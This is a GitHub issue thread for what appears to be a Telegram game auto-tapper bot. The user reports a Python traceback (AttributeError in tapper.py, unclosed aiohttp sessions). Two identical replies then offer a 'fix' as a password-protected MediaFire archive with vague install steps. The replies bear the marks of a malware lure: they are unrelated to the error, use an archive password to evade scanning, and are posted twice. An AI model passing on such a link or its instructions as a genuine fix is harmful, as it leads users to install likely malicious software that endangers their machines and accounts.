### ISSUE TITLE
Error while running

### ISSUE THREAD

**Issue by gauravyad69** [GravelFire/Tomarket#9]
usr/local/lib/python3.10/site-packages/tzlocal/unix.py:193: UserWarning: Can not find any timezone configuration, defaulting to UTC.
  warnings.warn("Can not find any timezone configuration, defaulting to UTC.")
Traceback (most recent call last):
  File "/app/main.py", line 13, in <module>
    asyncio.run(main())
  File "/usr/local/lib/python3.10/asyncio/runners.py", line 44, in run
    return loop.run_until_complete(main)
  File "/usr/local/lib/python3.10/asyncio/base_events.py", line 649, in run_until_complete
    return future.result()
  File "/app/main.py", line 8, in main
    await process()
  File "/app/bot/utils/launcher.py", line 96, in process
    await run_tasks(tg_clients=tg_clients)
  File "/app/bot/utils/launcher.py", line 112, in run_tasks
    await asyncio.gather(*tasks)
  File "/app/bot/core/tapper.py", line 364, in run_tapper
    await Tapper(tg_client=tg_client, proxy=proxy).run()
  File "/app/bot/core/tapper.py", line 339, in run
    if starttask is not None and starttask.get('data') and starttask.get('data', {}).get('status', 3) != 3:
AttributeError: 'str' object has no attribute 'get'
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x7ff2a0bcb7f0>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x7ff2a0af6b00>, 731078.183726511)]', '[(<aiohttp.client_proto.ResponseHandler object at 0x7ff2a0af6fe0>, 731086.511370696)]']
connector: <aiohttp.connector.TCPConnector object at 0x7ff2a0c1e050>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x7ff2a0c1fa30>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x7ff2a0af7940>, 731083.856554713)]', '[(<aiohttp.client_proto.ResponseHandler object at 0x7ff2a0b48160>, 731085.287982486)]']
connector: <aiohttp.connector.TCPConnector object at 0x7ff2a0b1cf70>

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
